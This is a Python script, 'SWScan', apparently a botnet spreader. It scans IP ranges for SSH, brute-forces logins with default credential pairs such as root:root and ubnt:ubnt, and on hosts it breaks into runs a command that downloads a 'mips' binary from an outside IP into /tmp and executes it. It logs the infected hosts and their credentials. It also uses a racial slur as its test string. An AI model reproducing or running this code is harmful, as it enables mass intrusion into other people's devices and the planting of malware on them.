1
#!/usr/bin/env python
2

3
import threading, paramiko, random, socket, time, os, sys
4

5
if not os.geteuid()==0:
6
	sys.exit("\nRoot access only fucking skid\n")
7

8
os.system("clear")
9
if len(sys.argv) < 3:
10
	print "SWScan DONT RAPE ME PLS"
11
	print "Usage: python "+sys.argv[0]+" [Start IP] [End IP] [0/1/2/perl/ubnt]"
12
	sys.exit("Example: python "+sys.argv[0]+" 125.27.0.0 125.27.255.255 1\n")
13

14
sys.stdout.write("\x1b]2;SWScan V1\x07")
15
os.system("clear")
16
os.system("echo -e 'ulimit -s 999999; ulimit -n 999999; ulimit -u 999999\n' > ~/.bashrc")
17
os.system("ulimit -s 999999; ulimit -n 999999; ulimit -u 999999")
18
paramiko.util.log_to_file("/dev/null") #quiets paramiko output
19
os.system("sysctl -w fs.file-max=999999 >/dev/null")
20

21
blacklist = [
22
    '127'
23
    '192'
24
]
25

26
passwords = [
27
    "ubnt:ubnt",
28
    "root:root",
29
    "root:admin",
30
    "admin:admin",
31
    "root:1234",
32
    "admin:1234",
33
    "guest:guest",
34
    "user:user",
35
    "test:test",
36
]
37

38
if sys.argv[3] == '1':
39
	passwords = [ "root:root", "root:admin", "admin:admin", "ubnt:ubnt", "root:1234", "admin:1234", "guest:guest", "user:user", "test:test" ] #Slow but effective
40
if sys.argv[3] == '2':
41
	passwords = [ "root:root", "admin:admin", "ubnt:ubnt" ] #faster with decent execution
42
if sys.argv[3] == 'perl':
43
	passwords = [ "pi:raspberry", "vagrant:vagrant" ] #perl scanner
44
if sys.argv[3] == 'ubnt':
45
	passwords = [ "ubnt:ubnt" ] #only ubnt
46

47
raw_input("Press <ENTER> to Scan")
48
credit = '# THIS IS PRIVATE BY Aries & B1NARY'
49
print "\033[0m" + credit + "\033[0m"
50

51
def ipRange(start_ip, end_ip):
52
	start = list(map(int, start_ip.split(".")))
53
	end = list(map(int, end_ip.split(".")))
54
	temp = start
55
	ip_range = []
56

57
	ip_range.append(start_ip)
58
	while temp != end:
59
		start[3] += 1
60
		for i in (3, 2, 1):
61
			if temp[i] == 256:
62
				temp[i] = 0
63
				temp[i-1] += 1
64
		ip_range.append(".".join(map(str, temp)))    
65

66
	return ip_range
67
class sshscanner(threading.Thread): # TAG: 1A
68
	def __init__ (self, ip):
69
		threading.Thread.__init__(self)
70
		self.ip = str(ip)
71
	global passwords
72
	def run(self):
73
		x = 1
74
		while x != 0:
75
			try:
76
				username='root'
77
				password="0"
78
				port = 22
79
				s.close()
80
                                s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
81
				s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
82
				s.settimeout(3)
83
				s.connect((self.ip, port))
84
				s.close()
85
				ssh = paramiko.SSHClient()
86
				ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
87
				dobreak=False
88
				for passwd in passwords:
89
					if ":n/a" in passwd:
90
						password=""
91
					else:
92
						password=passwd.split(":")[1]
93
					if "n/a:" in passwd:
94
						username=""
95
					else:
96
						username=passwd.split(":")[0]
97
					try:
98
						ssh.connect(self.ip, port = port, username=username, password=password, timeout=3)
99
						dobreak=True
100
						break
101
					except:
102
						pass
103
					if True == dobreak:
104
						break
105
				badserver=True
106
				stdin, stdout, stderr = ssh.exec_command("echo nigger")
107
				output = stdout.read()
108
				if "nigger" in output:
109
					badserver=False	
110
				if badserver == False:
111
					os.system("echo -e " +self.ip+ " >> .infected.ips")
112
					os.system("echo -e " +username+ ":" +password+ ":" +self.ip+ " >> infection.log")
113
					print "\033[32mInfecting -> " +username+ ":" +password+ ":" +self.ip+ "\033[0m"
114
					ssh.exec_command("cd /tmp && wget http://172.98.197.121/mips && chmod +x mips && ./mips")
115
					time.sleep(3)
116
					ssh.close()
117
				if badserver == True:
118
					ssh.close()
119
			except:
120
				pass
121
			x = 0
122
ip_range = ipRange("" +sys.argv[1], "" +sys.argv[2])
123
for ip in ip_range:
124
	try:				
125
		t = sshscanner(ip)
126
		t.start()
127
	except:
128
		pass
129